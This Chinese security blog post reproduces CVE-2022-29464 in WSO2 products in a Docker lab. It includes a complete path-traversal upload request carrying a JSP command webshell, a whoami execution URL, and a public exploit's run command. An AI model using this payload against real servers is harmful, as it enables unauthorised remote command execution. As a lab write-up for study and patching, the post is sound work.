CVE-2022-29464 WSO2文件上传漏洞复现

admin 2023年1月20日11:35:47安全文章评论5 views2235字阅读7分27秒阅读模式
01
漏洞简介

CVE-2022-29464 WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞允许攻击者未授权上传jsp webshell从而在WSO2服务器上执行任意命令。

02
漏洞影响版本
  • WSO2 API Manager 2.2.0—4.0.0

  • WSO2 Identity Server 5.2.0—5.11.0

  • WSO2 身份服务器5.4.0、5.4.1、5.5.0 和 5.6.0

  • WSO2 Enterprise Integrator 6.2.0—6.6.0

  • WSO2 身份服务器密钥管理器 5.3.0—5.10.0

03
漏洞环境搭建

可从vulfocus中拉取docker漏洞镜像,如图所示,执行命令

docker pull vulfocus/wso2-cve_2022_29464

拉取漏洞镜像

CVE-2022-29464 WSO2文件上传漏洞复现

漏洞镜像拉取完成后,如图所示,执行命令

docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464

运行漏洞docker环境

CVE-2022-29464 WSO2文件上传漏洞复现

漏洞环境启动完成后,访问

https://ip:9443

出现以下页面代表漏洞环境搭建成功

CVE-2022-29464 WSO2文件上传漏洞复现

04
漏洞复现

如图所示,构造如下数据包即可未授权在目标服务器上写入cmd webshell

POST /fileupload/toolsAny HTTP/1.1Host: 192.168.159.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911Cookie: session=0cb2ce62-1f82-4c51-8735-229398731d4f.XC9bRwlYo7x31-PjcBFWrJnuG_w; JSESSIONID=C7832D63E80798858C15459A4267966EUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteContent-Length: 805
--4af6f362a86baadf5ec3177278d4911Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"
<%@ page import="java.io.*" %>    <%    String cmd = request.getParameter("cmd");    String output = "";    if(cmd != null) {        String s = null;        try {            Process p = Runtime.getRuntime().exec(cmd,null,null);            BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));            while((s = sI.readLine()) != null) { output += s+"</br>"; }        }  catch(IOException e) {   e.printStackTrace();   }    }%>        <pre><%=output %></pre>--4af6f362a86baadf5ec3177278d4911--

CVE-2022-29464 WSO2文件上传漏洞复现

访问

https://192.168.159.130:9443/authenticationendpoint/cmd.jsp?cmd=whoami

构造参数cmd和参数值whoami,即可获得WSO2服务器whoami命令执行结果

CVE-2022-29464 WSO2文件上传漏洞复现

也可通过漏洞EXP

https://github.com/hakivvi/CVE-2022-29464

利用漏洞

如图所示,将EXP下载后,执行

python exploit.py https://ip:9443/ shell.jsp

即可上传jsp cmdshell至WSO2服务器

CVE-2022-29464 WSO2文件上传漏洞复现

访问

https://ip:9443//authenticationendpoint/shell.jsp

即可通过jsp cmdshell执行任意命令

CVE-2022-29464 WSO2文件上传漏洞复现

05
漏洞修复

将存在漏洞的WSO2应用版本升级至安全版本。

CVE-2022-29464 WSO2文件上传漏洞复现

CVE-2022-29464 WSO2文件上传漏洞复现

原文始发于微信公众号(第59号):CVE-2022-29464 WSO2文件上传漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月20日11:35:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2022-29464 WSO2文件上传漏洞复现 http://cn-sec.com/archives/1522432.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: